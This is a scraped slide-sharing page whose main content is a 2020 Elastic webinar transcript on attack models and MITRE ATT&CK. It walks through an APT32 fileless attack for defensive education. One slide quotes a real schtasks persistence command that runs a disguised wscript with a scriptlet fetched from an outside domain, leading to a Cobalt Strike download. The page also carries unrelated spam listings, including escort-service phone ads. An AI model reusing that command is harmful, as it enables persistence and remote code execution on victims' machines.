The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 

Recently uploaded (20)

TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 

Upgrade your attack model: finding and stopping fileless attacks with MITRE ATT&CK

  • 1. Presenter: Patrick Tierney Date: June 24, 2020 Upgrade Your Attack Model: Finding and Stopping Fileless Attacks with MITRE ATT&CK
  • 2. About Me Patrick Tierney Principal Solutions Architect patrick.tierney@elastic.co ▪ 20 years in the security industry in IT operations and sales ▪ Internet Security Systems/IBM 1998 and Endgame/Elastic (2010 ▪ Nerd credentials: I have 1500 comic books next to my desk right now
  • 3. What Is An Attack Model and What Does It Do?
  • 4. Attack Models capture information used to think like an attacker: threat modeling, abuse case development and refinement, data classification, and technology-specific attack patterns. Building Security In Maturity Model https://www.bsimm.com/about.html
  • 5. A Brief History of Attack Models Sorry, Stephen
  • 6. Diamond Security Model ● Looks simplistic, but can still be used to define complex attacks ● Includes the motivational factor of the attacker. ● Fully defined in a whitepaper here: https://www.activeresponse.org/wp-c ontent/uploads/2013/07/diamond.pdf
  • 7. Diamond Security Model ● Mapping the Attack on the Deathstar
  • 8. Cyber Attack Lifecycle ● Developed by Mandiant ● Defines the cycle involved in dwell time ● Defines a completed mission, but I don’t think an attacker thinks that way
  • 9. APT 39 Mapped to Cyber Attack Lifecycle
  • 10. Cyber Kill Chain™ ● Developed by Lockheed ● Defines 7 steps of an attack ● Probably the most common attack definition
  • 11. NIST Security Framework ● 5 columns (or Simon buttons, in the newer version) ● Created in response to Obama executive order ● Really more of a risk guideline framework than a model ● Only model to identify a recovery step
  • 12. So, what’s the problem with those?
  • 13. MITRE ATT&CK A More Complete Model for Today’s Threats ● Adversarial Tactics, Techniques & Common Knowledge ● Federally funded, non-profit organization ● Open source framework ● Over 300 attacker techniques identified ● Multiple OS coverage ● Malware is only part of the story ● Tests enterprise solutions ● Evaluate the raw test data for yourself: https://www.elastic.co/blog/visualizing-mitre-round-2-evaluation-results-Kibana
  • 14.
  • 15. If You Don’t Know What You’re Looking For, How Will You Ever Find It?
  • 16. Demo Time! Using the Matrix for fun and profit education
  • 17. APT32 In-Memory ATTACK Lets Walk Through an Example
  • 18. T1193  Spearphishing Attachment Phishing message with malicious document delivered through email T1036  Masquerading Masquerading as a legitimate Windows process T1053  Scheduled Task Persistence via scheduled task T1064  Scripting Malicious script execution from scheduled task T1055  Process Injection Process injection to gain code execution T1094  Custom Command and Control Command and control using Cobalt Strike ATT&CK MAPPING Techniques used in APT32 attack
  • 19. Technique ID T1193  Spearphishing Attachment Phishing message with malicious document delivered through email.
  • 20. Technique ID T1193  Spearphishing Attachment The attacker is counting on the end user to enable content for the document. And they often do.
  • 21. Technique ID T1036  Masquerading The first stage of the attack is to drop some files in c:ProgramData. But ying.exe is actually wscript.exe.
  • 22. Technique ID T1053  Scheduled Task The malicious document launches a scheduled task for persistence. schtasks /create /sc MINUTE /tn "GoogleUpdateTasksMachineCore" /tr ""C:ProgramDataYING.exe" //E:vbscript /b C:ProgramDataYANG.txt localhost "sc"r"i"p"t:https://steam.learning-api.com/ib.jpg" /mo 11 /F
  • 23. Technique ID T1064  Scripting From A Scheduled Task. The ying.exe loads an in-memory .NET binaries loader.dll and scrobj.dll
  • 24. Technique ID T1055  Process Injection The ying.exe process injects code into its own process (which is really wscript) to insert instructions for contacting the command and control server.
  • 25. Technique ID T1094  Custom Command and Control And now that it has its instructions, YING.exe reaches out to it’s control server, in this case to download a Cobalt Strike payload.
  • 26. T1193  Spearphishing Attachment Phishing message with malicious document delivered through email T1036  Masquerading Masquerading as a legitimate Windows process T1053  Scheduled Task Persistence via scheduled task T1064  Scripting Malicious script execution from scheduled task T1055  Process Injection Process injection to gain code execution T1094  Custom Command and Control Command and control using Cobalt Strike ATT&CK MAPPING Techniques used in APT32 attack
  • 27. How do I know if I’m protected?
  • 29. Website: https://atomicredteam.io/ Twitter: @redcanaryco GitHub: https://github.com/redcanaryco/atomic-red-team Free and open-sourced Powershell scripts to test your defenses against dozens of MITRE techniques.
  • 30. Website: https://attackiq.com/ Twitter: @attackiq Commercial software to automate MITRE based red team exercises
  • 31. Security how it should be: open Elastic Security integrates endpoint security and SIEM to give you prevention, collection, detection, and response capabilities for unified protection across your infrastructure. ELASTIC SECURITY
  • 32. www.elastic.co Search - Observe - Protect Thank You